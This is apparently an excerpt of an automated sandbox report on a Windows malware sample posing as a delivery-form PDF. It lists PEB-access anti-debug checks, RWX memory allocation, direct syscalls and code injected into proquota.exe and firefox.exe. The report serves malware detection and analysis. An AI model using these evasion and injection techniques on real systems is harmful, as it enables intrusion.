                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0D62A0 mov eax, dword ptr fs:[00000030h]3_2_2A0D62A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0D62A0 mov eax, dword ptr fs:[00000030h]3_2_2A0D62A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0D62A0 mov eax, dword ptr fs:[00000030h]3_2_2A0D62A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0D62A0 mov eax, dword ptr fs:[00000030h]3_2_2A0D62A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04A2C3 mov eax, dword ptr fs:[00000030h]3_2_2A04A2C3
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04A2C3 mov eax, dword ptr fs:[00000030h]3_2_2A04A2C3
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04A2C3 mov eax, dword ptr fs:[00000030h]3_2_2A04A2C3
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04A2C3 mov eax, dword ptr fs:[00000030h]3_2_2A04A2C3
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04A2C3 mov eax, dword ptr fs:[00000030h]3_2_2A04A2C3
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A1162D6 mov eax, dword ptr fs:[00000030h]3_2_2A1162D6
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0502E1 mov eax, dword ptr fs:[00000030h]3_2_2A0502E1
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0502E1 mov eax, dword ptr fs:[00000030h]3_2_2A0502E1
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0502E1 mov eax, dword ptr fs:[00000030h]3_2_2A0502E1
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A07A30B mov eax, dword ptr fs:[00000030h]3_2_2A07A30B
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A07A30B mov eax, dword ptr fs:[00000030h]3_2_2A07A30B
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A07A30B mov eax, dword ptr fs:[00000030h]3_2_2A07A30B
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A03C310 mov ecx, dword ptr fs:[00000030h] | 3_2_2A03C310
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A060310 mov ecx, dword ptr fs:[00000030h] | 3_2_2A060310
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A118324 mov eax, dword ptr fs:[00000030h] | 3_2_2A118324
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A118324 mov ecx, dword ptr fs:[00000030h] | 3_2_2A118324
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A118324 mov eax, dword ptr fs:[00000030h] | 3_2_2A118324
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A118324 mov eax, dword ptr fs:[00000030h] | 3_2_2A118324
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A10A352 mov eax, dword ptr fs:[00000030h] | 3_2_2A10A352
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0C2349 mov eax, dword ptr fs:[00000030h] | 3_2_2A0C2349
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0C2349 mov eax, dword ptr fs:[00000030h] | 3_2_2A0C2349
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0C2349 mov eax, dword ptr fs:[00000030h] | 3_2_2A0C2349
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0C2349 mov eax, dword ptr fs:[00000030h] | 3_2_2A0C2349
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0C2349 mov eax, dword ptr fs:[00000030h] | 3_2_2A0C2349
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0C2349 mov eax, dword ptr fs:[00000030h] | 3_2_2A0C2349
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0C2349 mov eax, dword ptr fs:[00000030h] | 3_2_2A0C2349
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0C2349 mov eax, dword ptr fs:[00000030h] | 3_2_2A0C2349
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0C2349 mov eax, dword ptr fs:[00000030h] | 3_2_2A0C2349
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0C2349 mov eax, dword ptr fs:[00000030h] | 3_2_2A0C2349
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0C2349 mov eax, dword ptr fs:[00000030h] | 3_2_2A0C2349
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0C2349 mov eax, dword ptr fs:[00000030h] | 3_2_2A0C2349
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0C2349 mov eax, dword ptr fs:[00000030h] | 3_2_2A0C2349
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0C2349 mov eax, dword ptr fs:[00000030h] | 3_2_2A0C2349
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0C2349 mov eax, dword ptr fs:[00000030h] | 3_2_2A0C2349
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0C035C mov eax, dword ptr fs:[00000030h] | 3_2_2A0C035C
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0C035C mov eax, dword ptr fs:[00000030h] | 3_2_2A0C035C
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0C035C mov eax, dword ptr fs:[00000030h] | 3_2_2A0C035C
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0C035C mov ecx, dword ptr fs:[00000030h] | 3_2_2A0C035C
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0C035C mov eax, dword ptr fs:[00000030h] | 3_2_2A0C035C
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0C035C mov eax, dword ptr fs:[00000030h] | 3_2_2A0C035C
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0E8350 mov ecx, dword ptr fs:[00000030h] | 3_2_2A0E8350
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A11634F mov eax, dword ptr fs:[00000030h] | 3_2_2A11634F
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0E437C mov eax, dword ptr fs:[00000030h] | 3_2_2A0E437C
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A06438F mov eax, dword ptr fs:[00000030h] | 3_2_2A06438F
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A06438F mov eax, dword ptr fs:[00000030h] | 3_2_2A06438F
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A03E388 mov eax, dword ptr fs:[00000030h] | 3_2_2A03E388
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A03E388 mov eax, dword ptr fs:[00000030h] | 3_2_2A03E388
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A03E388 mov eax, dword ptr fs:[00000030h] | 3_2_2A03E388
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A038397 mov eax, dword ptr fs:[00000030h] | 3_2_2A038397
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A038397 mov eax, dword ptr fs:[00000030h] | 3_2_2A038397
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A038397 mov eax, dword ptr fs:[00000030h] | 3_2_2A038397
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0FC3CD mov eax, dword ptr fs:[00000030h] | 3_2_2A0FC3CD
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A04A3C0 mov eax, dword ptr fs:[00000030h] | 3_2_2A04A3C0
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A04A3C0 mov eax, dword ptr fs:[00000030h] | 3_2_2A04A3C0
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A04A3C0 mov eax, dword ptr fs:[00000030h] | 3_2_2A04A3C0
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A04A3C0 mov eax, dword ptr fs:[00000030h] | 3_2_2A04A3C0
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A04A3C0 mov eax, dword ptr fs:[00000030h] | 3_2_2A04A3C0
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A04A3C0 mov eax, dword ptr fs:[00000030h] | 3_2_2A04A3C0
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0483C0 mov eax, dword ptr fs:[00000030h] | 3_2_2A0483C0
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0483C0 mov eax, dword ptr fs:[00000030h] | 3_2_2A0483C0
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0483C0 mov eax, dword ptr fs:[00000030h] | 3_2_2A0483C0
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0483C0 mov eax, dword ptr fs:[00000030h] | 3_2_2A0483C0
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0C63C0 mov eax, dword ptr fs:[00000030h] | 3_2_2A0C63C0
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0EE3DB mov eax, dword ptr fs:[00000030h] | 3_2_2A0EE3DB
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0EE3DB mov eax, dword ptr fs:[00000030h] | 3_2_2A0EE3DB
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0EE3DB mov ecx, dword ptr fs:[00000030h] | 3_2_2A0EE3DB
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0EE3DB mov eax, dword ptr fs:[00000030h] | 3_2_2A0EE3DB
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0E43D4 mov eax, dword ptr fs:[00000030h] | 3_2_2A0E43D4
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0E43D4 mov eax, dword ptr fs:[00000030h] | 3_2_2A0E43D4
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0503E9 mov eax, dword ptr fs:[00000030h] | 3_2_2A0503E9
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0503E9 mov eax, dword ptr fs:[00000030h] | 3_2_2A0503E9
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0503E9 mov eax, dword ptr fs:[00000030h] | 3_2_2A0503E9
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0503E9 mov eax, dword ptr fs:[00000030h] | 3_2_2A0503E9
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0503E9 mov eax, dword ptr fs:[00000030h] | 3_2_2A0503E9
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0503E9 mov eax, dword ptr fs:[00000030h] | 3_2_2A0503E9
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0503E9 mov eax, dword ptr fs:[00000030h] | 3_2_2A0503E9
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0503E9 mov eax, dword ptr fs:[00000030h] | 3_2_2A0503E9
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A05E3F0 mov eax, dword ptr fs:[00000030h] | 3_2_2A05E3F0
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A05E3F0 mov eax, dword ptr fs:[00000030h] | 3_2_2A05E3F0
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A05E3F0 mov eax, dword ptr fs:[00000030h] | 3_2_2A05E3F0
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0763FF mov eax, dword ptr fs:[00000030h] | 3_2_2A0763FF
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0C4000 mov ecx, dword ptr fs:[00000030h] | 3_2_2A0C4000
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0E2000 mov eax, dword ptr fs:[00000030h] | 3_2_2A0E2000
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0E2000 mov eax, dword ptr fs:[00000030h] | 3_2_2A0E2000
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0E2000 mov eax, dword ptr fs:[00000030h] | 3_2_2A0E2000
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0E2000 mov eax, dword ptr fs:[00000030h] | 3_2_2A0E2000
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0E2000 mov eax, dword ptr fs:[00000030h] | 3_2_2A0E2000
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0E2000 mov eax, dword ptr fs:[00000030h] | 3_2_2A0E2000
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0E2000 mov eax, dword ptr fs:[00000030h] | 3_2_2A0E2000
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0E2000 mov eax, dword ptr fs:[00000030h] | 3_2_2A0E2000
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A05E016 mov eax, dword ptr fs:[00000030h] | 3_2_2A05E016
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A05E016 mov eax, dword ptr fs:[00000030h] | 3_2_2A05E016
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A05E016 mov eax, dword ptr fs:[00000030h] | 3_2_2A05E016
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A05E016 mov eax, dword ptr fs:[00000030h] | 3_2_2A05E016
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A03A020 mov eax, dword ptr fs:[00000030h] | 3_2_2A03A020
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A03C020 mov eax, dword ptr fs:[00000030h] | 3_2_2A03C020
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0D6030 mov eax, dword ptr fs:[00000030h] | 3_2_2A0D6030
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A042050 mov eax, dword ptr fs:[00000030h] | 3_2_2A042050
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0C6050 mov eax, dword ptr fs:[00000030h] | 3_2_2A0C6050
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A06C073 mov eax, dword ptr fs:[00000030h] | 3_2_2A06C073
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A04208A mov eax, dword ptr fs:[00000030h] | 3_2_2A04208A
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0380A0 mov eax, dword ptr fs:[00000030h] | 3_2_2A0380A0
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0D80A8 mov eax, dword ptr fs:[00000030h] | 3_2_2A0D80A8
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A1060B8 mov eax, dword ptr fs:[00000030h] | 3_2_2A1060B8
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A1060B8 mov ecx, dword ptr fs:[00000030h] | 3_2_2A1060B8
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0C20DE mov eax, dword ptr fs:[00000030h] | 3_2_2A0C20DE
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A03A0E3 mov ecx, dword ptr fs:[00000030h] | 3_2_2A03A0E3
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0C60E0 mov eax, dword ptr fs:[00000030h] | 3_2_2A0C60E0
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0480E9 mov eax, dword ptr fs:[00000030h] | 3_2_2A0480E9
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A03C0F0 mov eax, dword ptr fs:[00000030h] | 3_2_2A03C0F0
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0820F0 mov ecx, dword ptr fs:[00000030h] | 3_2_2A0820F0
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0EE10E mov eax, dword ptr fs:[00000030h] | 3_2_2A0EE10E
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0EE10E mov ecx, dword ptr fs:[00000030h] | 3_2_2A0EE10E
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0EE10E mov eax, dword ptr fs:[00000030h] | 3_2_2A0EE10E
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0EE10E mov eax, dword ptr fs:[00000030h] | 3_2_2A0EE10E
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0EE10E mov ecx, dword ptr fs:[00000030h] | 3_2_2A0EE10E
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0EE10E mov eax, dword ptr fs:[00000030h] | 3_2_2A0EE10E
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0EE10E mov eax, dword ptr fs:[00000030h] | 3_2_2A0EE10E
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0EE10E mov ecx, dword ptr fs:[00000030h] | 3_2_2A0EE10E
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0EE10E mov eax, dword ptr fs:[00000030h] | 3_2_2A0EE10E
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0EE10E mov ecx, dword ptr fs:[00000030h] | 3_2_2A0EE10E
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A100115 mov eax, dword ptr fs:[00000030h] | 3_2_2A100115
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0EA118 mov ecx, dword ptr fs:[00000030h] | 3_2_2A0EA118
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0EA118 mov eax, dword ptr fs:[00000030h] | 3_2_2A0EA118
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0EA118 mov eax, dword ptr fs:[00000030h] | 3_2_2A0EA118
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0EA118 mov eax, dword ptr fs:[00000030h] | 3_2_2A0EA118
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A070124 mov eax, dword ptr fs:[00000030h] | 3_2_2A070124
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0D4144 mov eax, dword ptr fs:[00000030h] | 3_2_2A0D4144
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0D4144 mov eax, dword ptr fs:[00000030h] | 3_2_2A0D4144
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0D4144 mov ecx, dword ptr fs:[00000030h] | 3_2_2A0D4144
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0D4144 mov eax, dword ptr fs:[00000030h] | 3_2_2A0D4144
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0D4144 mov eax, dword ptr fs:[00000030h] | 3_2_2A0D4144

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Memory allocated: C:\Users\Public\Libraries\dxobknwL.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF | Memory allocated: C:\Users\Public\Libraries\dxobknwL.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF | Memory allocated: C:\Users\Public\Libraries\dxobknwL.pif base: 400000 protect: page execute and read and write
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | NtCreateKey: Direct from: 0x76F02C6C
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | NtSetInformationThread: Direct from: 0x76F02B4C
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | NtOpenSection: Direct from: 0x76F02E0C
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | NtSetInformationThread: Direct from: 0x76EF63F9
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | NtCreateFile: Direct from: 0x76F02FEC
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | NtOpenFile: Direct from: 0x76F02DCC
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | NtTerminateThread: Direct from: 0x76F02FCC
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | NtCreateMutant: Direct from: 0x76F035CC
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | NtResumeThread: Direct from: 0x76F036AC
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | NtReadFile: Direct from: 0x76F02ADC
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | NtDelayExecution: Direct from: 0x76F02DDC
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | NtResumeThread: Direct from: 0x76F02FBC
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | NtCreateUserProcess: Direct from: 0x76F0371C
Source: C:\Users\Public\Libraries\dxobknwL.pif | Section loaded: NULL target: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe protection: execute and read and write
Source: C:\Users\Public\Libraries\dxobknwL.pif | Section loaded: NULL target: C:\Windows\SysWOW64\proquota.exe protection: execute and read and write
Source: C:\Users\Public\Libraries\dxobknwL.pif | Section loaded: NULL target: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: NULL target: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe protection: read write
Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: NULL target: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | Section loaded: NULL target: C:\Users\Public\Libraries\dxobknwL.pif protection: execute and read and write
